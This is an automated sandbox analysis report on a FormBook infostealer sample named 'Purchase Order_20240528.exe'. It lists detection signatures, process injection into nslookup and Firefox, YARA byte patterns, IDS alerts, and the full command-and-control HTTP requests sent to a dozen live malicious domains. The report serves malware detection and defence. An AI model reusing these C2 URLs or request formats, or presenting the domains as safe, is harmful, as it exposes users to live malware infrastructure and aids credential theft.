Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase Order_20240528.exe

Overview

General Information

Sample name:Purchase Order_20240528.exe
Analysis ID:1448264
MD5:b6422c6c56cdab2a43415fdcceeaf3e6
SHA1:e05e478ce595c575d20f26b9cecc027068af5cd4
SHA256:91c657cef25403ba946ecfe02fa69010169e8ab2515d3a1608b405ac3d12c1cd
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses nslookup.exe to query domains
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Purchase Order_20240528.exe (PID: 1764 cmdline: "C:\Users\user\Desktop\Purchase Order_20240528.exe" MD5: B6422C6C56CDAB2A43415FDCCEEAF3E6)
    • Purchase Order_20240528.exe (PID: 6424 cmdline: "C:\Users\user\Desktop\Purchase Order_20240528.exe" MD5: B6422C6C56CDAB2A43415FDCCEEAF3E6)
      • qFrNDyfVqdmmFLBeyXwBmuB.exe (PID: 3892 cmdline: "C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • nslookup.exe (PID: 6600 cmdline: "C:\Windows\SysWOW64\nslookup.exe" MD5: 9D2EB13476B126CB61B12CDD03C7DCA6)
          • qFrNDyfVqdmmFLBeyXwBmuB.exe (PID: 1364 cmdline: "C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 644 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.2210026041.0000000001510000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.2210026041.0000000001510000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a9f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1406f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2d033:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x166b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000005.00000002.4539900115.0000000003020000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 12 entries

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        Timestamp:05/28/24-07:16:53.334171
        SID:2855464
        Source Port:49733
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/28/24-07:18:01.720040
        SID:2855464
        Source Port:49753
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/28/24-07:15:38.516275
        SID:2855464
        Source Port:49713
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/28/24-07:18:15.208740
        SID:2855464
        Source Port:49757
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/28/24-07:17:09.283748
        SID:2855464
        Source Port:49738
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/28/24-07:16:42.377017
        SID:2855464
        Source Port:49730
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/28/24-07:16:15.498664
        SID:2855464
        Source Port:49722
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/28/24-07:17:20.398275
        SID:2855464
        Source Port:49741
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/28/24-07:18:17.738015
        SID:2855464
        Source Port:49758
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/28/24-07:15:52.921989
        SID:2855464
        Source Port:49718
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/28/24-07:16:12.940995
        SID:2855464
        Source Port:49721
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/28/24-07:16:55.860764
        SID:2855464
        Source Port:49734
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/28/24-07:17:47.272667
        SID:2855464
        Source Port:49749
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/28/24-07:17:33.834488
        SID:2855464
        Source Port:49745
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/28/24-07:16:26.572363
        SID:2855464
        Source Port:49725
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/28/24-07:17:06.750149
        SID:2855464
        Source Port:49737
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/28/24-07:17:49.818347
        SID:2855464
        Source Port:49750
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/28/24-07:18:49.380784
        SID:2855464
        Source Port:49761
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/28/24-07:16:29.112208
        SID:2855464
        Source Port:49726
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/28/24-07:16:39.845789
        SID:2855464
        Source Port:49729
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/28/24-07:18:04.253452
        SID:2855464
        Source Port:49754
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/28/24-07:18:51.922417
        SID:2855464
        Source Port:49762
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/28/24-07:17:22.933853
        SID:2855464
        Source Port:49742
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/28/24-07:17:36.363867
        SID:2855464
        Source Port:49746
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/28/24-07:15:50.391688
        SID:2855464
        Source Port:49717
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/28/24-07:15:35.984016
        SID:2855464
        Source Port:49712
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus detection for URL or domain
        Source: http://www.vpachurch.org.uk/hx08/Avira URL Cloud: Label: malware
        Source: http://www.ceo-retreats.co.uk/5s1a/Avira URL Cloud: Label: malware
        Source: http://www.vpachurch.org.uk/hx08/?jTZPp=+oCaj1A6qEgI197rJOt7Ie8wsT2QuaXvROrTbUaj/j401+U4/uihyXQLAHBQaX+oDSz5ZwQ8h3X94ZPhTrAPuKUxKp/Iu26MuBlEIc7q5Ez/5s4fDAcFIXmEd7qvwqTcBaCACgU=&5L0=2bCPy0Avira URL Cloud: Label: malware
        Source: http://www.ilodezu.com/07pn/?5L0=2bCPy0&jTZPp=CkfhBQ0terXRm+kmFpR39GSw1qHfnjo/tEzZ3zV38o+ejGSQGyq9lQZrlkGU0XQ7mu5ow3wpwcVqSHGJiQ9hplKQ2SOdF7l7JcVc6ChkY2r17h/XM0ANapemWrr0lME50EL+8pQ=Avira URL Cloud: Label: malware
        Source: http://www.ceo-retreats.co.uk/5s1a/?jTZPp=0jq67MNPRq4g2+jjEmEFgdmxU9xn3lZuU82S2yL3jkWaNmBkMCuTzs1oACp+jQZQfFcSAdfVUnty14PGpb+cvJdHxRsAacQFCcCRXvTpLBxg40F9NDu9hRQlsdpJQY/jGZexiU8=&5L0=2bCPy0Avira URL Cloud: Label: malware
        Multi AV Scanner detection for domain / URL
        Source: vpachurch.org.ukVirustotal: Detection: 8%Perma Link
        Multi AV Scanner detection for submitted file
        Source: Purchase Order_20240528.exeVirustotal: Detection: 41%Perma Link
        Source: Purchase Order_20240528.exeReversingLabs: Detection: 26%
        Yara detected FormBook
        Source: Yara matchFile source: 00000003.00000002.2210026041.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.4539900115.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.4539802866.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.4541673061.0000000004F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.4538883092.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2213803816.0000000001900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Machine Learning detection for sample
        Source: Purchase Order_20240528.exeJoe Sandbox ML: detected
        Source: Purchase Order_20240528.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: Purchase Order_20240528.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: nslookup.pdb source: Purchase Order_20240528.exe, 00000003.00000002.2209729010.0000000001158000.00000004.00000020.00020000.00000000.sdmp, Purchase Order_20240528.exe, 00000003.00000002.2209729010.0000000001170000.00000004.00000020.00020000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000003.2148531111.000000000124B000.00000004.00000020.00020000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000002.4538100125.000000000125D000.00000004.00000020.00020000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000003.2148531111.000000000125A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: nslookup.pdbGCTL source: Purchase Order_20240528.exe, 00000003.00000002.2209729010.0000000001158000.00000004.00000020.00020000.00000000.sdmp, Purchase Order_20240528.exe, 00000003.00000002.2209729010.0000000001170000.00000004.00000020.00020000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000003.2148531111.000000000124B000.00000004.00000020.00020000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000002.4538100125.000000000125D000.00000004.00000020.00020000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000003.2148531111.000000000125A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000000.2132913413.00000000003AE000.00000002.00000001.01000000.0000000D.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000000.2285918681.00000000003AE000.00000002.00000001.01000000.0000000D.sdmp
        Source: Binary string: wntdll.pdbUGP source: Purchase Order_20240528.exe, 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, nslookup.exe, 00000005.00000003.2213210353.0000000002FD4000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 00000005.00000003.2209385108.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: Purchase Order_20240528.exe, Purchase Order_20240528.exe, 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, nslookup.exe, nslookup.exe, 00000005.00000003.2213210353.0000000002FD4000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 00000005.00000003.2209385108.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_02A6BD30 FindFirstFileW,FindNextFileW,FindClose,5_2_02A6BD30
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 4x nop then jmp 06D16A72h0_2_06D16172
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 4x nop then xor eax, eax5_2_02A597F0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 4x nop then pop edi5_2_02A622FB

        Networking

        barindex
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49712 -> 3.33.130.190:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49713 -> 3.33.130.190:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49717 -> 212.227.172.254:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49718 -> 212.227.172.254:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49721 -> 199.59.243.225:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49722 -> 199.59.243.225:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49725 -> 46.30.215.104:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49726 -> 46.30.215.104:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49729 -> 92.205.15.157:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49730 -> 92.205.15.157:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49733 -> 76.223.67.189:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49734 -> 76.223.67.189:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49737 -> 216.40.34.41:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49738 -> 216.40.34.41:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49741 -> 203.161.43.227:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49742 -> 203.161.43.227:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49745 -> 185.229.21.229:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49746 -> 185.229.21.229:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49749 -> 178.63.50.103:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49750 -> 178.63.50.103:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49753 -> 108.179.192.228:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49754 -> 108.179.192.228:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49757 -> 149.88.84.60:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49758 -> 149.88.84.60:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49761 -> 3.33.130.190:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49762 -> 3.33.130.190:80
        Uses nslookup.exe to query domains
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeProcess created: C:\Windows\SysWOW64\nslookup.exe "C:\Windows\SysWOW64\nslookup.exe"
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeProcess created: C:\Windows\SysWOW64\nslookup.exe "C:\Windows\SysWOW64\nslookup.exe"Jump to behavior
        Source: Joe Sandbox ViewIP Address: 76.223.67.189 76.223.67.189
        Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
        Source: Joe Sandbox ViewASN Name: ONECOMDK ONECOMDK
        Source: Joe Sandbox ViewASN Name: GD-EMEA-DC-SXB1DE GD-EMEA-DC-SXB1DE
        Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /07pn/?5L0=2bCPy0&jTZPp=CkfhBQ0terXRm+kmFpR39GSw1qHfnjo/tEzZ3zV38o+ejGSQGyq9lQZrlkGU0XQ7mu5ow3wpwcVqSHGJiQ9hplKQ2SOdF7l7JcVc6ChkY2r17h/XM0ANapemWrr0lME50EL+8pQ= HTTP/1.1Host: www.ilodezu.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
        Source: global trafficHTTP traffic detected: GET /hx08/?jTZPp=+oCaj1A6qEgI197rJOt7Ie8wsT2QuaXvROrTbUaj/j401+U4/uihyXQLAHBQaX+oDSz5ZwQ8h3X94ZPhTrAPuKUxKp/Iu26MuBlEIc7q5Ez/5s4fDAcFIXmEd7qvwqTcBaCACgU=&5L0=2bCPy0 HTTP/1.1Host: www.vpachurch.org.ukAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
        Source: global trafficHTTP traffic detected: GET /9rbi/?5L0=2bCPy0&jTZPp=UlNdZMK3GDRCBA0gS3f3uv0iXo+GpLYhxRIJfHdOWu/UoVzLYqkjSevahCA40rp7GDeAe0gS/eGNqMgOt0FXhd7M6VrSAWuVtivoglmtHt75iy7sMY8OQO52M7HjA3SJMCHiGMs= HTTP/1.1Host: www.shopnaya.frAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
        Source: global trafficHTTP traffic detected: GET /gy0x/?5L0=2bCPy0&jTZPp=q3tVqQVST/58pKcjgu6vzl4r/mjx+/3v5p1oiGGfWC80c0QmTZc7sue0joIh5TaOhvctfB+I4hP6RP0S+zGuZLn5ZOGHWIzMGtqXZLXUxKwwwvK+KKFBFwNnv8XJAo+gt0xcEPY= HTTP/1.1Host: www.etrading.cloudAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
        Source: global trafficHTTP traffic detected: GET /5s1a/?jTZPp=0jq67MNPRq4g2+jjEmEFgdmxU9xn3lZuU82S2yL3jkWaNmBkMCuTzs1oACp+jQZQfFcSAdfVUnty14PGpb+cvJdHxRsAacQFCcCRXvTpLBxg40F9NDu9hRQlsdpJQY/jGZexiU8=&5L0=2bCPy0 HTTP/1.1Host: www.ceo-retreats.co.ukAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
        Source: global trafficHTTP traffic detected: GET /ia1k/?5L0=2bCPy0&jTZPp=N7K37PwQwyq8WtMjD63BMb0ZEyGwsNHc8DxE6cCELPJHzMSs3RHBfzipjgIXVLm7nNAJX0ce6IW46RQAVIH59zJ0Pe4NazJJs+xz0T8fA0+K0n7VQeZLcDOWBXiB3y7ehLtrmgc= HTTP/1.1Host: www.mavonorm-global.ukAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
        Source: global trafficHTTP traffic detected: GET /3gap/?jTZPp=25XBmjk0rqRaZkTkTD33T4OKGuWwQ/SEWL7mpnFDJER+MbRh/i2897KjaMR3WmWzMQOMItzOUFcJjK77+ET6PAxFDluhudTDf5JDha8/kN27L+7nUHVdmuvgnjQrBoWJDdvnsqo=&5L0=2bCPy0 HTTP/1.1Host: www.adhdphotography.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
        Source: global trafficHTTP traffic detected: GET /dkdj/?5L0=2bCPy0&jTZPp=U2MbIDwYObql7+StDszk2IWvOqKP49Y4LLLXxrmKfStKROUY/qK9Zw3EJYAbIJoej5+11dDiuiwrzCxekQQ2SsNjLcEghxbMGsQSE4hdcQPQTWeOxMh44mhCIwJzKEDB4Xq2erE= HTTP/1.1Host: www.allgiftedmalaysia.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
        Source: global trafficHTTP traffic detected: GET /05xu/?jTZPp=ReZNC8TX9gJaOIK/BvITh+0FGwzFHm92bQvbNg62F2J0R8z5SuhCGDe2HN2Byu0BC7BKvHjRxIjSR8MFICml92wEl2DsCCajGT/6l7iIm8MBifF7wDoE5bE7ZGx4kkh6K6rbsW4=&5L0=2bCPy0 HTTP/1.1Host: www.shortput.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
        Source: global trafficHTTP traffic detected: GET /zzbw/?5L0=2bCPy0&jTZPp=SYw/9+A27wDBBFVE9oOer+iKSaxo18ff/QICalIUdVK4tpmTGYvTJqWTGl/IZc6vUKz9bMfWLss6gerKkQ1b4agtfT85HThTdgJ4Gv37GO/tiVjy/t6jt5abgYoy/lcD8efQawI= HTTP/1.1Host: www.cuddle-paws.co.ukAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
        Source: global trafficHTTP traffic detected: GET /l7wc/?jTZPp=rG0gXsVcMKnwL95DCAGLkXtixogTaqlVvgNhyV5MOQBbV9UvRUrQqDi5YjTtkNY5nkWwRtE2kxMBrn6VhlI+Nig16EK01wjkMFHIaUG8fjlX1oi4FBapVJcXf+AOShDHzPE0tCU=&5L0=2bCPy0 HTTP/1.1Host: www.home-stroi0m.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
        Source: global trafficHTTP traffic detected: GET /qy3g/?5L0=2bCPy0&jTZPp=7q/G7U1VqeddkNflMKI5sgAtLetf9b28atPRKW5PTHlUqHsLUKcur6rUhXkF0p+A/GSL70VLC9tJc0iDQkT9IaJtmga1X/Il1jAXyheslQ8xXpmoQqjsBC9sonYkPfqEZQpcDiM= HTTP/1.1Host: www.betopfloor.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
